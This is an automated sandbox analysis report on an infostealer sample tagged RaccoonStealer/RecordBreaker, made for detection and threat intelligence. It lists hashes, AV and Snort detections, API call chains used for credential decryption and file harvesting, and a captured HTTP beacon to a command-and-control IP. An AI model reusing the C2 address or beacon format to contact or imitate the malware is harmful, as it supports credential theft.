Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zRZljp49Uz

Overview

General Information

Sample Name:zRZljp49Uz (renamed file extension from none to exe)
Analysis ID:650286
MD5:0cfa58846e43dd67b6d9f29e97f6c53e
SHA1:19d9fbfd9b23d4bd435746a524443f1a962d42fa
SHA256:022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03
Tags:exeRaccoonStealerRecordBreaker
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Uses 32bit PE files
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to query locales information (e.g. system language)
Found evasive API chain checking for process token information
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Program does not show much activity (idle)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • zRZljp49Uz.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\zRZljp49Uz.exe" MD5: 0CFA58846E43DD67B6D9F29E97F6C53E)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.551.195.166.18449746802036934 06/22/22-12:00:13.668134
SID:2036934
Source Port:49746
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.551.195.166.18449746802036882 06/22/22-12:00:13.668134
SID:2036882
Source Port:49746
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: zRZljp49Uz.exeAvira: detected
Source: zRZljp49Uz.exeVirustotal: Detection: 73%Perma Link
Source: zRZljp49Uz.exeMetadefender: Detection: 28%Perma Link
Source: zRZljp49Uz.exeReversingLabs: Detection: 88%
Source: http://51.195.166.184/Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A41806 lstrlen,LocalAlloc,LocalAlloc,lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,0_2_00A41806
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A41726 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree,0_2_00A41726
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A417A1 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,0_2_00A417A1
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A4617D LocalAlloc,CryptStringToBinaryA,lstrlen,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree,0_2_00A4617D
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A43244 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,0_2_00A43244
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A427C6 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,0_2_00A427C6
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A42CC6 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,0_2_00A42CC6
Source: zRZljp49Uz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: zRZljp49Uz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A41E26 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,0_2_00A41E26
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A4AF2C LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,LocalFree,FindClose,0_2_00A4AF2C
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A4643A LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,0_2_00A4643A
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A41B13 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindClose,0_2_00A41B13
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A4B29D LocalAlloc,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,0_2_00A4B29D
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A43C9D StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,0_2_00A43C9D
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A439E5 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,0_2_00A439E5
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A49DEA LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,0_2_00A49DEA
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A45870 LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,0_2_00A45870
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A4197C FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,0_2_00A4197C
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A46053 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,lstrlenW,0_2_00A46053
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A45D00 LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,GetLogicalDriveStringsW,GetDriveTypeW,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,StrStrW,StrStrW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,StrStrW,GetEnvironmentVariableW,LocalFree,LocalFree,StrCpyW,LocalFree,LocalFree,0_2_00A45D00

Networking

barindex
Source: TrafficSnort IDS: 2036882 ET TROJAN Generic Stealer Config Download Request 192.168.2.5:49746 -> 51.195.166.184:80
Source: TrafficSnort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.5:49746 -> 51.195.166.184:80
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewIP Address: 51.195.166.184 51.195.166.184
Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.184
Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.184
Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.184
Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.184
Source: unknownTCP traffic detected without corresponding DNS query: 51.195.166.184
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Wed, 22 Jun 2022 10:00:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: keep-aliveContent-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originX-DNS-Prefetch-Control: offExpect-CT: max-age=0X-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffOrigin-Agent-Cluster: ?1X-Permitted-Cross-Domain-Policies: noneReferrer-Policy: no-referrerX-XSS-Protection: 0ETag: W/"e-vDAjs2Bjp2gdskaBRytU+hHw1Ow"Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found
Source: zRZljp49Uz.exe, 00000000.00000002.415337506.0000000000802000.00000004.00000020.00020000.00000000.sdmp, zRZljp49Uz.exe, 00000000.00000003.414770587.0000000000802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.195.166.184/
Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: recordHost: 51.195.166.184Content-Length: 95Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 61 6c 66 6f 6e 73 26 63 6f 6e 66 69 67 49 64 3d 35 39 63 39 37 33 37 32 36 34 63 30 62 33 32 30 39 64 39 31 39 33 62 38 64 65 64 36 63 31 32 37 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=59c9737264c0b3209d9193b8ded6c127
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: 0_2_00A479F3 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,StrStrW,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,InternetOpenW,InternetOpenW,InternetConnectW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,lstrlen,HttpSendRequestW,lstrlenW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalFree,LocalFree,LocalFree,0_2_00A479F3
Source: zRZljp49Uz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\zRZljp49Uz.exeCode function: String function: 00A41806 appears 92 times
Source: zRZljp49Uz.exeVirustotal: Detection: 73%
Source: zRZljp49Uz.exeMetadefender: Detection: 28%